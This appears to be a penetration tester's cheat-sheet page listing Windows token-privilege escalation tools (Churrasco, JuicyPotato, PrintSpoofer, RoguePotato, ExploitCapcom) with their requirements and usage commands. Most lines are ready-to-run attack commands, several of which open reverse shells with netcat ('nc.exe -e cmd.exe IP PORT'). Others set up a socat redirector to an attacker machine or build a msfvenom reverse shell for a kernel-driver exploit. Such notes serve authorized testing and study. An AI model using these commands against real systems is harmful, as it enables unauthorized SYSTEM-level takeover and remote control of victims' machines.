windows token exploits

Churrasco

REQUIREMENTS:

SeImpersonalPrivilege
Windows XP/VISTA/2003/2008, Win Server 2003

# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"

HotPotato

Windows 7,8,10, Server 2008, Server 2012

JuicyPotato

REQUIREMENTS:

SeImpersonatePrivilege
machine is < Windows 10 1809 < Windows Server 2019
CLSID: http://ohpe.it/juicy-potato/CLSID/
- Can use http://ohpe.it/juicy-potato/CLSID/GetCLSID.ps1
Try: {03ca98d6-ff5d-49b8-abc6-03dd84127020}

> JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID
> Juicy.Potato.x86.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID

> PSExec64.exe -i -u "nt authority\local service" <shell.exe>

PrintSpoofer

REQUIREMENTS:

SeImpersonatePrivilege
Win10, Server 2016, Server 2019

> PrintSpoofer.exe -i -c cmd.exe
> PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"
# -i : interactive
# -c : command to run

RoguePotato

REQUIREMENTS:

SeImpersonatePrivilege
machine is >= Windows 10 1809 & Windows Server 2019

# socat redirector for OXID resolving, must use 135
$ socat tcp-listen:135,reuseaddr,fork tcp:KALI_IP:9999
> RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999

SeLoadDriverPrivilege

REQUIREMENTS:

Visual Studio to compile

Steps:

obtain user SID
1. Get-ADUser -Identity 'svc-print' | select SID
2. (New-Object System.Security.Principal.NTAccount("svc-print")).Translate([System.Security.Principal.SecurityIdentifier]).value
Clone Repo: tandasat/ExploitCapcom/
Generate .exe msfvenom reverse shell
Update path to reverse shell on target line 410 in file ExploitCapcom.cpp
Set for RELEASE
Build Solution
run .\ExploitCapcom.exe

SeBackupPrivilege

https://github.com/giuliano108/SeBackupPrivilege

Previouswindows iot core Nextwise care 365, wisebootassistant

Last updated 3 years ago

Was this helpful?